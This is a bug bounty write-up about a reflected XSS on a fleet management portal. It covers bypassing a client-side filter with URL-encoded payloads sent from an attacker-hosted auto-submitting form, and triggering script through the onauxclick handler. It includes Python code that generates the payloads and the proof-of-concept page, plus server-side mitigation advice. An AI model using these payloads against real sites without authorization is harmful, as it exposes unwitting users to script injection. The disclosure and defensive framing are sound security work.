Disclosure: This vulnerability has been resolved by the program. No company names, specific domains, or reproduction steps that could identify the target are included in this write-up. All research was conducted within an authorized bug bounty program.
Starting Point: Google Dorking for Attack Surface
I wasn’t handed this target — I found it. That’s how most of my sessions start: with reconnaissance before I’ve even decided what to test.
Google dorking is underrated as a first step. Most hunters go straight to subdomain enumeration, but the search index has already crawled things that your tooling might miss — legacy portals, forgotten subdomains, publicly indexed forms. A well-crafted site: query combined with inurl:search or inurl:query is often enough to surface interesting input vectors fast.
That’s exactly what happened here. A dorking session surfaced a search function on a fleet management portal — a web application that, based on its content and structure, was clearly handling real business users. The kind of target where XSS isn’t just a theoretical risk.
The Filter: A False Sense of Security
The search field had client-side validation. Submit anything with special characters (quotes, angle brackets, equals signs) and you'd get a friendly alert: only alphanumeric characters are allowed.
This is where a lot of testers stop. They see the error, note it as “input validation in place,” and move on.
I saw it as a starting hypothesis: what is this filter actually checking, and where?
Client-side filters are enforced in the browser. They are not enforced on the server. The moment you bypass the browser’s gatekeeping — by crafting a request directly, modifying form data, or encoding the payload — the server sees whatever you send it, and it either handles it safely or it doesn’t.
The Bypass: URL Encoding
The filter was checking the raw string value of the input field. It wasn’t checking what that string decoded to on the server side.
URL encoding substitutes special characters with their percent-encoded equivalents. A double quote " becomes %22. An equals sign = becomes %3d. The server decodes these back into the original characters when it processes the request, but the client-side filter never flags them: the encoded string it inspects contains nothing but letters, digits, and percent signs.
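To make the transformation concrete, here is a minimal Python sketch. The payload is illustrative, not the one from the actual report:

```python
from urllib.parse import quote, unquote

# Illustrative reflected-XSS probe, not the payload from the actual report.
payload = '"><img src=x onerror=alert(1)>'

# Percent-encode everything outside the always-safe character set.
encoded = quote(payload, safe='')
print(encoded)  # %22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E

# The encoded form contains only letters, digits, and percent signs,
# so a naive "special characters" check has nothing to flag.
assert unquote(encoded) == payload
```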
By submitting a URL-encoded XSS payload through a crafted POST request rather than typing directly into the field, I bypassed the filter entirely. The server accepted the input, reflected it back in the response, and the browser decoded and rendered the payload as intended.
The key to making this work in practice was building an external HTML form that submitted the encoded payload directly to the target’s search endpoint via POST — removing the browser’s input field from the equation entirely. This is a standard technique for testing server-side handling independent of client-side controls.
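Here is a sketch of what such an attacker-hosted page could look like, generated here with Python purely for illustration. The endpoint URL and the q parameter name are placeholders (the real ones are withheld), and how many decode passes the server applies to the submitted value is application-specific:

```python
from urllib.parse import quote

# Placeholder endpoint and field name; the real ones are withheld.
TARGET = "https://target.example/search"
payload = '"><img src=x onauxclick=alert(document.domain)>'

# An attacker-hosted page that POSTs the encoded payload straight to the
# search endpoint, so the target's own input field (and its client-side
# filter) never runs at all.
attack_page = f"""<!doctype html>
<form id="f" action="{TARGET}" method="POST">
  <input type="hidden" name="q" value="{quote(payload, safe='')}">
</form>
<script>document.getElementById('f').submit()</script>
"""

with open("poc.html", "w") as fh:
    fh.write(attack_page)
```

Opening poc.html in a browser auto-submits the form; whether the payload survives depends entirely on how the server decodes the parameter.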
The Self-XSS Challenge
After initial triage, I received a reasonable question from the program: can you prove this isn’t self-XSS?
Self-XSS is a class of “vulnerability” where you can only execute script in your own browser session — for example, by pasting a payload into your own browser console. It has no real-world impact because you can’t trick someone else into triggering it. Programs rightfully push back on these.
My initial proof-of-concept relied on a trigger that only fired when the user interacted directly with the search field. I needed to demonstrate that an unwitting third party could be made to trigger the payload without knowing it.
The answer was the onauxclick event handler.
onauxclick fires when a user right-clicks or middle-clicks an element. It’s an event handler that most developers don’t think about hardening against — it doesn’t appear in the standard lists of XSS event handlers, and it’s not something sanitization libraries always strip. Critically, right-clicking is a completely natural user action — it doesn’t require the victim to type anything or take any unusual step.
By injecting onauxclick as the event handler in my payload, I showed that any user who visited the crafted URL and simply right-clicked in the search area would trigger script execution — entirely without intent, and entirely under attacker control.
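For a concrete, entirely hypothetical picture of what the server might send back, assuming the decoded term is reflected into the search input's value attribute:

```python
# Hypothetical reflection; the real response markup is withheld.
# The decoded payload closes the value attribute and plants an
# onauxclick handler on a large, innocuous-looking element.
decoded = '"><div style="min-height:300px" onauxclick="alert(document.domain)">'

reflected = f'<input type="text" name="q" value="{decoded}">'

# Any right- or middle-click on the injected <div> now executes the
# handler; the victim types nothing and takes no unusual step.
print(reflected)
```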
That updated proof-of-concept was enough. The report was escalated to triaged status.
What Made This Work
Three independent factors came together:
Client-side-only validation. The filter lived in the browser, not on the server. Any mechanism that can be bypassed by crafting a request outside the application's own UI is not a security control; it's a UX feature.
Reflected input without server-side encoding. The search term was echoed back into the page response without proper output encoding. The server trusted the input it received. If the server had HTML-encoded the reflected value before inserting it into the page, the payload would have rendered as harmless text.
An overlooked event handler. onauxclick isn’t onclick. Developers auditing for XSS tend to focus on the obvious handlers. Less common event handlers — onauxclick, onpointerdown, onformdata, and others — can slip through filters that are pattern-matching against a known-bad list rather than applying structural sanitization.
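As a hypothetical illustration of why known-bad lists fail here, consider a sanitizer that pattern-matches only the handlers its author thought to enumerate:

```python
import re

# Hypothetical blocklist sanitizer: strips only the event attributes
# its author knew about.
KNOWN_BAD = re.compile(r'\bon(click|load|error|mouseover|focus)\s*=',
                       re.IGNORECASE)

def naive_sanitize(value: str) -> str:
    return KNOWN_BAD.sub('', value)

print(naive_sanitize('<img src=x onerror=alert(1)>'))  # handler stripped
print(naive_sanitize('<div onauxclick=alert(1)>'))     # passes untouched
```

Structural sanitization (parsing the markup and allowlisting attributes) or, better, output encoding avoids this cat-and-mouse game entirely.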
Mitigation
The right fix isn't a better client-side filter; it's output encoding on the server. Any value that originates from user input and gets inserted into an HTML response needs to be encoded at the point of insertion, using a context-aware encoding library or an auto-escaping template engine rather than manual pattern-matching.
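In Python, for instance, the standard library's html.escape applies exactly this encoding (auto-escaping template engines such as Jinja2 do it for you):

```python
from html import escape

user_input = '"><div onauxclick="alert(document.domain)">'

# Encode at the point of insertion: the payload becomes inert text.
safe = escape(user_input, quote=True)
print(safe)
# &quot;&gt;&lt;div onauxclick=&quot;alert(document.domain)&quot;&gt;

# The quotes can no longer close the attribute, so no handler is injected.
rendered = f'<input type="text" name="q" value="{safe}">'
```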
CWE-79 (Improper Neutralization of Input During Web Page Generation) describes this class of vulnerability well. The root cause is never the input itself — it’s the output handling.
Takeaway
Filter bypass isn’t always about clever obfuscation. Sometimes it’s simply about asking: where does this filter actually run, and what does the server see instead?
If the answer is “the server sees the raw value after decoding,” and the server reflects that value into the page without encoding it — you have your path.
The recon that found this target took minutes. The filter bypass took minutes. The lesson: client-side validation that isn't backed by server-side output encoding is not a security control. It's a speed bump.